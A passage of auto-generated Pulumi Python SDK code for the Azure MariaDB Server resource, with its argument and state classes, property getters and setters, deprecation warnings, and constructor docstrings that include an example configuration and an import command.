pulumi.set(__self__, "sku_name", sku_name)
pulumi.set(__self__, "version", version)
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_login_password is not None:
pulumi.set(__self__, "administrator_login_password", administrator_login_password)
if auto_grow_enabled is not None:
pulumi.set(__self__, "auto_grow_enabled", auto_grow_enabled)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if creation_source_server_id is not None:
pulumi.set(__self__, "creation_source_server_id", creation_source_server_id)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if restore_point_in_time is not None:
pulumi.set(__self__, "restore_point_in_time", restore_point_in_time)
if ssl_enforcement is not None:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
if ssl_enforcement is not None:
pulumi.set(__self__, "ssl_enforcement", ssl_enforcement)
if ssl_enforcement_enabled is not None:
pulumi.set(__self__, "ssl_enforcement_enabled", ssl_enforcement_enabled)
if storage_mb is not None:
pulumi.set(__self__, "storage_mb", storage_mb)
if storage_profile is not None:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
if storage_profile is not None:
pulumi.set(__self__, "storage_profile", storage_profile)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> pulumi.Input[str]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@sku_name.setter
def sku_name(self, value: pulumi.Input[str]):
pulumi.set(self, "sku_name", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@administrator_login_password.setter
def administrator_login_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login_password", value)
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
"""
return pulumi.get(self, "auto_grow_enabled")
@auto_grow_enabled.setter
def auto_grow_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_grow_enabled", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> Optional[pulumi.Input[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@creation_source_server_id.setter
def creation_source_server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_source_server_id", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> Optional[pulumi.Input[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@restore_point_in_time.setter
def restore_point_in_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restore_point_in_time", value)
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ssl_enforcement")
@ssl_enforcement.setter
def ssl_enforcement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_enforcement", value)
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@ssl_enforcement_enabled.setter
def ssl_enforcement_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssl_enforcement_enabled", value)
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> Optional[pulumi.Input[int]]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@storage_mb.setter
def storage_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_mb", value)
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> Optional[pulumi.Input['ServerStorageProfileArgs']]:
return pulumi.get(self, "storage_profile")
@storage_profile.setter
def storage_profile(self, value: Optional[pulumi.Input['ServerStorageProfileArgs']]):
pulumi.set(self, "storage_profile", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServerState:
def __init__(__self__, *,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input['ServerStorageProfileArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Server resources.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[str] fqdn: The FQDN of the MariaDB Server.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
if administrator_login is not None:
pulumi.set(__self__, "administrator_login", administrator_login)
if administrator_login_password is not None:
pulumi.set(__self__, "administrator_login_password", administrator_login_password)
if auto_grow_enabled is not None:
pulumi.set(__self__, "auto_grow_enabled", auto_grow_enabled)
if backup_retention_days is not None:
pulumi.set(__self__, "backup_retention_days", backup_retention_days)
if create_mode is not None:
pulumi.set(__self__, "create_mode", create_mode)
if creation_source_server_id is not None:
pulumi.set(__self__, "creation_source_server_id", creation_source_server_id)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if geo_redundant_backup_enabled is not None:
pulumi.set(__self__, "geo_redundant_backup_enabled", geo_redundant_backup_enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if restore_point_in_time is not None:
pulumi.set(__self__, "restore_point_in_time", restore_point_in_time)
if sku_name is not None:
pulumi.set(__self__, "sku_name", sku_name)
if ssl_enforcement is not None:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
if ssl_enforcement is not None:
pulumi.set(__self__, "ssl_enforcement", ssl_enforcement)
if ssl_enforcement_enabled is not None:
pulumi.set(__self__, "ssl_enforcement_enabled", ssl_enforcement_enabled)
if storage_mb is not None:
pulumi.set(__self__, "storage_mb", storage_mb)
if storage_profile is not None:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
if storage_profile is not None:
pulumi.set(__self__, "storage_profile", storage_profile)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> Optional[pulumi.Input[str]]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@administrator_login.setter
def administrator_login(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login", value)
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@administrator_login_password.setter
def administrator_login_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "administrator_login_password", value)
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
"""
return pulumi.get(self, "auto_grow_enabled")
@auto_grow_enabled.setter
def auto_grow_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_grow_enabled", value)
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@backup_retention_days.setter
def backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "backup_retention_days", value)
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> Optional[pulumi.Input[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@create_mode.setter
def create_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_mode", value)
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> Optional[pulumi.Input[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@creation_source_server_id.setter
def creation_source_server_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_source_server_id", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
The FQDN of the MariaDB Server.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@geo_redundant_backup_enabled.setter
def geo_redundant_backup_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "geo_redundant_backup_enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> Optional[pulumi.Input[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@restore_point_in_time.setter
def restore_point_in_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "restore_point_in_time", value)
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@sku_name.setter
def sku_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku_name", value)
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ssl_enforcement")
@ssl_enforcement.setter
def ssl_enforcement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_enforcement", value)
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@ssl_enforcement_enabled.setter
def ssl_enforcement_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssl_enforcement_enabled", value)
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> Optional[pulumi.Input[int]]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@storage_mb.setter
def storage_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_mb", value)
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> Optional[pulumi.Input['ServerStorageProfileArgs']]:
return pulumi.get(self, "storage_profile")
@storage_profile.setter
def storage_profile(self, value: Optional[pulumi.Input['ServerStorageProfileArgs']]):
pulumi.set(self, "storage_profile", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
class Server(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a MariaDB Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_server = azure.mariadb.Server("exampleServer",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
administrator_login="mariadbadmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="B_Gen5_2",
storage_mb=5120,
version="10.2",
auto_grow_enabled=True,
backup_retention_days=7,
geo_redundant_backup_enabled=False,
public_network_access_enabled=False,
ssl_enforcement_enabled=True)
```
## Import
MariaDB Server's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mariadb/server:Server server1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.DBforMariaDB/servers/server1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a MariaDB Server.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_server = azure.mariadb.Server("exampleServer",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
administrator_login="mariadbadmin",
administrator_login_password="H@Sh1CoR3!",
sku_name="B_Gen5_2",
storage_mb=5120,
version="10.2",
auto_grow_enabled=True,
backup_retention_days=7,
geo_redundant_backup_enabled=False,
public_network_access_enabled=False,
ssl_enforcement_enabled=True)
```
## Import
MariaDB Server's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mariadb/server:Server server1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.DBforMariaDB/servers/server1
```
:param str resource_name: The name of the resource.
:param ServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServerArgs.__new__(ServerArgs)
__props__.__dict__["administrator_login"] = administrator_login
__props__.__dict__["administrator_login_password"] = administrator_login_password
